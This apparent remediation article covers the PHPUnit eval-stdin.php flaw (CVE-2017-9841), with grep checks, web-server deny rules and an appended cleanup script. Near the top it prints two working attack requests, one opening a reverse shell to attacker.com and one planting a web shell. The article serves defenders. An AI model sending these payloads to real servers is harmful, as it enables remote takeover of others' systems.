Introduction: A Tiny File with Catastrophic Consequences

In the sprawling ecosystem of PHP dependencies, few files have a reputation as infamous as eval-stdin.php. Tucked deep within the phpunit/phpunit source tree (src/Util/PHP/eval-stdin.php), this small script became the epicenter of one of the most widely exploited remote code execution (RCE) vulnerabilities in modern web history: CVE-2017-9841.

The attack is a request to

https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

with a raw POST body containing any PHP code. Two example requests as they would appear on the wire:

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: victim.com

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

<?php file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>'); ?>

To check whether the vulnerable file is present in a deployment:

grep -r "php://input" vendor/phpunit/
grep -r "eval-stdin" vendor/

Step 1: Immediate Patch (No, Not Just an Update)

Simply updating PHPUnit via Composer does not remove the vulnerable file if it already exists. A Composer update adds new versions but leaves old files behind unless you purge first.

Independently of the purge, block the vendor/ directory at the web server so that no file under it is ever reachable over HTTP.

nginx:

location ~ ^/vendor/ {
    deny all;
    return 403;
}

Apache:

<Directory "vendor/">
    Require all denied
</Directory>
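A defender's follow-up to Step 1, added here as an example that is not part of the original article: a POSIX shell helper that audits and removes stale copies of eval-stdin.php under every vendor/ tree below a chosen root (the ROOT argument and the function names are assumptions of this example).

```shell
#!/bin/sh
# Added example, not code from the original article: locate and purge leftover
# copies of phpunit's eval-stdin.php under every vendor/ tree below ROOT, since
# a plain "composer update" leaves the old file in place. Assumes POSIX sh with
# find and grep; ROOT defaults to the current directory.

# List every eval-stdin.php that sits inside a vendor/ tree under ROOT.
find_eval_stdin() {
    root="${1:-.}"
    find "$root" -path '*/vendor/*' -type f -name 'eval-stdin.php' 2>/dev/null
}

# Count vendor/ PHP files that read php://input, the secondary indicator the
# article greps for, so a renamed copy of the script does not slip through.
count_php_input_readers() {
    root="${1:-.}"
    find "$root" -path '*/vendor/*' -type f -name '*.php' \
        -exec grep -l 'php://input' {} + 2>/dev/null | wc -l | tr -d ' '
}

# Delete every eval-stdin.php found under ROOT and print how many were removed.
# Counting before and after avoids the subshell trap of a piped while-read loop.
purge_eval_stdin() {
    root="${1:-.}"
    before=$(find_eval_stdin "$root" | wc -l | tr -d ' ')
    find "$root" -path '*/vendor/*' -type f -name 'eval-stdin.php' \
        -exec rm -f {} + 2>/dev/null
    after=$(find_eval_stdin "$root" | wc -l | tr -d ' ')
    echo $((before - after))
}

# Usage (run manually after reviewing the audit list):
#   find_eval_stdin /var/www          # audit only
#   purge_eval_stdin /var/www         # remove and print the count
```

Run the audit first and, once the file is gone, still apply the web server deny rule so a future dependency install cannot re-expose it.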